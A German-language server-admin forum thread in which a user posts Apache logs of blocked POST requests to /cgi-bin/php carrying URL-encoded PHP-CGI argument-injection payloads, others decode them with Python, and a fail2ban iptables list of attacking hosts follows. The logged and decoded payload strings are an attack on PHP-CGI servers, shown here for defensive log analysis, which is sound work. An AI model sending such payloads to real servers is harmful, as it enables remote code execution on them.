Um was handelt es sich...

  • Thread starter Thread starter Deleted member 14254
  • Start date Start date
D

Deleted member 14254

Guest
hierbei...

Code: 
201.144.227.143 - - [13/Dec/2013:13:43:59 +0000] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 403 273
201.144.227.143 - - [13/Dec/2013:13:43:59 +0000] "POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 403 274
Code: 
54.205.94.180 - - [13/Dec/2013:13:50:32 +0000] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 403 273
54.205.94.180 - - [13/Dec/2013:13:50:32 +0000] "POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 403 274

Hab ich heute seit mehreren Stunden... Jedesmal Adressen aus den USA und Mexico. Gut: f2b hat mittlerweile an die 40 geblocked... Aber... Spaß ist etwas anderes...
Diese Zahlen/-Prozentzeichen... sind das ausführbare Codes, oder wie könnte man das interpretieren? Also Schwachstellen in cgi-Scripten suchen...
Inbetracht das das "POSTs sind - SQL-Injection-Versuche?

Wollt letztes Mal schon gefragt haben aber kam nicht dazu...

Bedanke mich herzlich für Hilfe im Vorab :)
 
huh, das ging schnell, Danke @DeaD_EyE :) Hoffe, danach, wenn ich des gelesen hab, vergeht mir net das Lachen :o

Ah! jo... Gut zu wissen. Sehr lehrreich, wie, gesagt, weil ich schonmal so komische Anfragen hatte, ist gut ein 2, kann sein 3 Monate her. Auch diese Prozentzeichen und Hex-Zahlen...

Hab kein Plesk oder andere Admin-Panels installiert. Mache alles (bis auf phpmyadmin/postfixadmin) manuell und die liegen ipbeschränkt. Von außen nicht zu sehen... *schweiß-abputz* :o :o
 
Last edited by a moderator:
Hatte mich vorhin gefragt wie ich solche posts mit python in lesbaren Text umwandeln kann. Stackoverflow weiß einfach alles :-D

Code: 
import urllib
>>> urllib.unquote('%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E')
'-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-n'

oder ohne urllib:

Code: 
s = '%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E'

print s.replace('%', r'\x').decode('string-escape')
 
Last edited by a moderator:
Danke Euch Beiden nochmal :) Bin grade am lesen... Hmmmh... schon heftig das Teil. Bin froh, das gentoo immer neue Versionen Apache's und php einsetzt. Gut, Fehler können überall sein, aber beruhigt schon zu wissen...
 
Hey Neutrino,

ich hatte hier einige Erfahrungen zu berichten, schau mal hier:

Apache Magika, meine Story, schnelle Hilfe

Hallo liebes Forum, jetzt wirds mal Zeit, dass ich euch von dem Spaß berichte den ich die letzten Tage hatte. Ich betreibe mehrere Server, und Glück auf, alle die wichtig sind bisher ohne ernsthafte Probleme. Mein alter Proxyserver den ich mir für mich und einige Arbeitskollegen aufgesetzt...
serversupportforum.de serversupportforum.de
 
Hallo treue Helfer :)

Danke Dir für den Hinweis auf Deine Erlebnisse, @Rootserveradmin :)
Habe mir diese mal durchgelesen. Wie bist Du denn auf die Addy des IRC-Networks gekommen, von wo dieser Botnetbetreiber aus operiert? In diesen nachgeladenen Sachen? Bzw. IP von wo aus er zugegriffen hat? Hast BackTrack gemacht?

Schon hammer die Story... 20.000gekaperte Systeme... Schöne Rechenleistung.
Liegt Firmenerpressung sicher im Repertoire für die "schnelle geldbeschaffung" griffbereit...

Bekommt Ihr denn imho auch noch diese Zeilen? Also mein Server hat heute an die 50 Adressen geblocked, die diese (aus dem Anfangspost) Zeile an meinen Server sandten...

Bin ich allein oder gehts Euch auch so?

(Ist jetz nicht als "Alarm" gedacht... wollt Euch nur mal das "Muster" zeigen, was sich mittlerweile bei den etlichen IPTables-Zeilen bildet... ;) - Vielleicht kommen dem einen oder anderen ja die IP's bekannt vor ;)

Code: 
Chain fail2ban-apache-auth (1 references)
 pkts bytes target     prot opt in     out     source               destination         
   21  1160 REJECT     all  --  any    any     ec2-175-41-149-218.ap-southeast-1.compute.amazonaws.com  anywhere             reject-with icmp-port-unreachable
   23 16128 REJECT     all  --  any    any     ec2-23-21-133-42.compute-1.amazonaws.com  anywhere             reject-with icmp-port-unreachable
   34  1860 REJECT     all  --  any    any     ec2-54-193-19-125.us-west-1.compute.amazonaws.com  anywhere             reject-with icmp-port-unreachable
   21 14166 REJECT     all  --  any    any     140.11.85.115.ids.service.eastern-tele.com  anywhere             reject-with icmp-port-unreachable
   55 14417 REJECT     all  --  any    any     services.uia.org.ar  anywhere             reject-with icmp-port-unreachable
   72 18820 REJECT     all  --  any    any     frodo.imtek.uni-freiburg.de  anywhere             reject-with icmp-port-unreachable
   73  4244 REJECT     all  --  any    any     81.17.28.124         anywhere             reject-with icmp-port-unreachable
    0     0 REJECT     all  --  any    any     149.13.21.15         anywhere             reject-with icmp-port-unreachable
    0     0 REJECT     all  --  any    any     ec2-176-34-229-101.eu-west-1.compute.amazonaws.com  anywhere             reject-with icmp-port-unreachable
    0     0 REJECT     all  --  any    any     hosted-by.ecatel.net  anywhere             reject-with icmp-port-unreachable
    0     0 REJECT     all  --  any    any     .                    anywhere             reject-with icmp-port-unreachable
   45  8863 REJECT     all  --  any    any     mail.uni.net         anywhere             reject-with icmp-port-unreachable
    0     0 REJECT     all  --  any    any     175.138.65.233       anywhere             reject-with icmp-port-unreachable
   21  1092 REJECT     all  --  any    any     static-27-131-56-170.mykris.net  anywhere             reject-with icmp-port-unreachable
   32  1744 REJECT     all  --  any    any     ns1.inf-mate.com     anywhere             reject-with icmp-port-unreachable
   17 14839 REJECT     all  --  any    any     ec2-107-20-207-67.compute-1.amazonaws.com  anywhere             reject-with icmp-port-unreachable
   16 10875 REJECT     all  --  any    any     61.19.42.28          anywhere             reject-with icmp-port-unreachable
    8   416 REJECT     all  --  any    any     mobile.ekt-skylink.ru  anywhere             reject-with icmp-port-unreachable
    0     0 REJECT     all  --  any    any     uidzr185188.sattnet.cz  anywhere             reject-with icmp-port-unreachable
   44  2392 REJECT     all  --  any    any     80.66.145.198        anywhere             reject-with icmp-port-unreachable
   31 16628 REJECT     all  --  any    any     ec2-54-235-249-209.compute-1.amazonaws.com  anywhere             reject-with icmp-port-unreachable
   29  1576 REJECT     all  --  any    any     ec2-50-18-190-171.us-west-1.compute.amazonaws.com  anywhere             reject-with icmp-port-unreachable
   26  1432 REJECT     all  --  any    any     61.153.0.130         anywhere             reject-with icmp-port-unreachable
    9   360 REJECT     all  --  any    any     89.114.57.49         anywhere             reject-with icmp-port-unreachable
    9   468 REJECT     all  --  any    any     poczta.csc.com.pl    anywhere             reject-with icmp-port-unreachable
   32  1744 REJECT     all  --  any    any     v-183-181-26-71.ub-freebit.net  anywhere             reject-with icmp-port-unreachable
   49 16551 REJECT     all  --  any    any     telefon.ru.static-pool.is74.ru  anywhere             reject-with icmp-port-unreachable
   55 19671 REJECT     all  --  any    any     95-31-228-228.internet.b2c.beeline.ru  anywhere             reject-with icmp-port-unreachable
   50 23176 REJECT     all  --  any    any     202.91.244.249       anywhere             reject-with icmp-port-unreachable
   39  2096 REJECT     all  --  any    any     ec2-54-249-54-109.ap-northeast-1.compute.amazonaws.com  anywhere             reject-with icmp-port-unreachable
   35 11130 REJECT     all  --  any    any     host.173.54.23.62.rev.coltfrance.com  anywhere             reject-with icmp-port-unreachable
    0     0 REJECT     all  --  any    any     162.89-234-195.multi-visp.com  anywhere             reject-with icmp-port-unreachable
   28 14602 REJECT     all  --  any    any     ec2-177-71-244-66.sa-east-1.compute.amazonaws.com  anywhere             reject-with icmp-port-unreachable
   23 14238 REJECT     all  --  any    any     pc13.jamk.hu         anywhere             reject-with icmp-port-unreachable
   33  1796 REJECT     all  --  any    any     ec2-54-193-20-225.us-west-1.compute.amazonaws.com  anywhere             reject-with icmp-port-unreachable
    0     0 REJECT     all  --  any    any     222.186.56.7         anywhere             reject-with icmp-port-unreachable
    6   312 REJECT     all  --  any    any     wserver2.w802.net    anywhere             reject-with icmp-port-unreachable
63413   20M RETURN     all  --  any    any     anywhere             anywhere
 
Last edited by a moderator:
You must log in or register to reply here.
Back
Top